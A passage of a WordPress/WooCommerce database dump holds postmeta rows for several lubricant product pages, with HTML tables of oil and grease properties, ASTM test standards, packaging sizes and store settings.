center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10440, 993, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10441, 993, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10442, 993, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10443, 993, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10444, 993, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10445, 993, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10446, 993, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10447, 993, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10448, 993, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10449, 993, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10450, 993, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10451, 993, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10452, 993, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10453, 993, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10454, 993, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10455, 993, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10456, 993, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10457, 993, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10458, 993, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10459, 993, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10460, 993, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10461, 993, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10462, 993, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10463, 993, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10464, 993, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10465, 993, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10466, 993, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10467, 993, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10468, 993, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10469, 993, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10498, 977, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10499, 993, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10500, 993, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10501, 994, '_edit_lock', '1474468696:2'); 
INSERT INTO `wp_postmeta` VALUES (10502, 995, '_edit_lock', '1474297590:2'); 
INSERT INTO `wp_postmeta` VALUES (10503, 995, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10504, 995, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10505, 995, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10506, 995, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10507, 995, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10508, 995, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10509, 995, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10510, 995, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10511, 995, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10512, 995, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10513, 995, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10514, 995, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10515, 995, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10516, 995, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10517, 995, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10518, 995, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10519, 995, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10520, 995, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10521, 995, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10522, 995, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10523, 995, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10524, 995, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10525, 995, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10526, 995, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10527, 995, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10528, 995, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10529, 995, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10530, 995, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10531, 995, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10532, 995, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10533, 995, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10534, 995, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10535, 995, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10536, 995, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10565, 995, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10566, 995, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10567, 994, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10568, 996, '_edit_lock', '1474297765:2'); 
INSERT INTO `wp_postmeta` VALUES (10569, 996, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10570, 996, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10571, 996, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10572, 996, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10573, 996, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10574, 996, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10575, 996, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10576, 996, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10577, 996, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10578, 996, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10579, 996, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10580, 996, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10581, 996, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10582, 996, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10583, 996, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10584, 996, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10585, 996, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10586, 996, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10587, 996, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10588, 996, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10589, 996, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10590, 996, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10591, 996, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10592, 996, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10593, 996, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10594, 996, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10595, 996, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10596, 996, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10597, 996, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10598, 996, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10599, 996, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10600, 996, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10601, 996, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10602, 996, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10631, 996, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10632, 996, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10633, 997, '_edit_lock', '1474297808:2'); 
INSERT INTO `wp_postmeta` VALUES (10634, 997, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10635, 997, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10636, 997, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10637, 997, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
